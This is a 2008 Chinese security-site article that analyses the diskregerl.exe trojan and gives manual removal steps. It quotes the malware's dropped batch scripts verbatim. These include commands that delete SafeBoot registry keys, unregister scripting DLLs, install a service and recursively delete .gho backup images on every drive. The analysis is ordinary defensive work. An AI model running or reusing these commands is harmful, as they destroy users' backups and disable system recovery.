|
|
|||||||||||
|
|||||||||||||
| 当前位置: 电脑软硬件应用网 > 电脑学院 > 网络安全 > 正文 |
|
|||
| diskregerl.exe(Trojan.Agent.cdt)病毒手动查杀 | |||
| 2008-4-14 15:57:16 文/孤独更可… 出处:发掘网 | |||
|
文件名称:diskregerl.exe
文件大小:45,056 字节
AV命名:Trojan.Agent.cdt
加壳方式:UPX
编写语言:VC
文件MD5:e98a4571cf72b798077d12d6c4894629
行为分析:
1、拷贝文件:
C:\windows\system32\diskregerl.exe 45,056 字节
2、无添加启动项举动。
3、释放2个批处理:
内容分别为:
22483 17213 25187 6133 22690 25373 date 2004-08-17 19477 time 20:00:00 ping 127.0.0.1 -n 5 sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot sc.exe description diskregerl 创建网络连接2 regsvr32.exe /u /s scrrun.dll regsvr32.exe /u /s shimgvw.dll regsvr32.exe /u /s itss.dll regsvr32.exe /u /s vbscript.dll regsvr32.exe /s jscript.dll reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F 23413 sc.exe start diskregerl del "C:\WINDOWS\Media\Windows XP 开始.wav" del "C:\WINDOWS\Media\Windows XP 信息栏.wav" del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav" regsvr32.exe /s C:\windows\system32\Programnot.dll ping 127.0.0.1 -n 6 del "C:\Documents and Settings\孤独更可靠\桌面\oky.exe" /F 22483 17213 date 2008-04-02 time 08:21:33
del %0 exit
第二个:
25187 6133 226902537319477 2819720092 404 ping 127.0.0.1 -n 16 13539 cmd.exe /c del /f /s /q c:*.gho 6752 cmd.exe /c del /f /s /q d:*.gho 31772 cmd.exe /c del /f /s /q e:*.gho 12028 cmd.exe /c del /f /s /q f:*.gho 8720 cmd.exe /c del /f /s /q g:*.gho 10731 cmd.exe /c del /f /s /q h:*.gho 8840 cmd.exe /c del /f /s /q i:*.gho 11736
regsvr32.exe /s C:\windows\system32\Programnot.dll del %0 exit
4、连接网站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外该病毒可能恶意锁定IE主页,不过未实现。
解决方法:
1、重启计算机。
2、删除文件:
C:\windows\system32\diskregerl.exe
3、如果重启后病毒无法删除,请下载冰刃(该软件可到down.45its.com下载),结束其进程。 |
|||
| 关于45IT | About 45IT | 联系方式 | 版权声明 | 网站导航 | |
|
Copyright © 2003-2011 45IT. All Rights Reserved 浙ICP备09049068号 |
